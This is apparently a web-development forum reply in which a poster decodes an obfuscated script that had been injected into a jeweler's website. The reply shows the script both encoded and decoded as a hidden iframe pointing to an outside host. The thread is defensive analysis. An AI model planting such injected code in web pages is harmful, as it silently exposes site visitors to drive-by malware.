Posted by BootNic on 11/23/04 11:43

> "Jack Mahon" <mahon@princealbert.com> wrote:
> news:viJVf.13061$%H.12433@clgrps13....
>
> Hello,
>
> a friend visited a commercial jeweler's website and somehow got a
> virus warning on her computer ("win32/worfo").
>
> I checked out the site in question, but could find nothing on the
> home page code except the last line in the source code, located
> after the body end-tag.
>
> The line is this:
> <script>s='epdvnfou/xsjuf)#=jgsbnf!tuzmf>(ejtqmbz;opof(!xjeui>2!ifjhiu>2!tsd>(iuuq;00usvtu5gsff/xt0@je>joefy2:(?=0jgsbnf?#*<';o='';for(i=0;i<113;i++){o+=String.fromCharCode(s.charCodeAt(i)-1);}eval(o);</script>
>
> I don't have a clue what this means. Can anyone help?


Looks like it adds a hidden iframe.

document.write("<iframe style='display:none' width=1 height=1 src='http://trust4free.ws/?id=index19'></iframe>");


--
BootNic Monday, March 27, 2006 12:51 AM

Have no fear of perfection - you'll never reach it.
*Salvador Dali*

• Next in forum: Your choice...
• Prev in forum: Re: how to check a radio button
• Thread view: Re: malicious script?

[Reply to this message]